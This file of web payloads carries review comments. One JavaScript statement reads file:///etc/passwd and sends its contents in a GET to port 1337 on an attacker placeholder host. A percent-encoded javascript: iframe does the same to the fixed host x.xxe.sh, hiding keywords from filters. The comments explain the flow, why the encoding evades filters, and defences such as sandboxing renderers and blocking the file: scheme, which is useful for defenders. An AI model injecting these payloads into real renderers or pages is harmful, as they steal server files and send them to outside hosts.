// Local-file read with out-of-band exfiltration, written as one injectable statement.
// Flow: request `x` fetches file:///etc/passwd; when it loads, its onload handler
// opens a second request `l` whose URL path is the URL-encoded response body and
// sends it to port 1337 on a host left here as the <ATTACKER-SERVER> placeholder.
// `x` and `l` are assigned without a declaration, so they are implicit globals;
// the statement relies on sloppy mode and would throw in strict-mode code.
// There is no onerror handler, so a blocked file read fails silently: the lack
// of a callback does not by itself show that the rendering context is safe.
// NOTE(review): the read only succeeds where the script runs with access to
// file:// URLs, presumably a server-side HTML renderer (HTML-to-PDF converter,
// headless browser) that loads untrusted markup from a local origin. Ordinary
// http(s) pages are normally refused this request. Confirm against the context
// under test.
// Defensive takeaways: turn off script execution in the renderer or deny the
// file: scheme, run the renderer sandboxed with no outbound network access, and
// alert on renderer hosts issuing outbound GETs with long percent-encoded paths.
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<!--
  iframe whose src is a javascript: URL with every character percent-encoded.
  Decoded, the URL body is the same statement as the plain script on the first
  line of this page (read file:///etc/passwd via XMLHttpRequest, then send the
  URL-encoded contents in the path of a GET to port 1337), followed by a
  trailing newline (%0a).
  NOTE(review): unlike the plain script, the encoded form does not carry the
  <ATTACKER-SERVER> placeholder. It decodes to the fixed hostname x.xxe.sh, so
  running it unmodified would send file contents to that third-party host.
  Treat the hostname as an indicator to search for in egress and DNS logs.
  Why the encoding matters for defenders: keywords such as XMLHttpRequest and
  file:/// never appear literally in the markup, so filters that match on those
  strings miss it. Sanitisers should parse and normalise URL attributes and
  reject the javascript: scheme in src/href outright, and renderers handling
  untrusted HTML should have scripting disabled.
-->
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>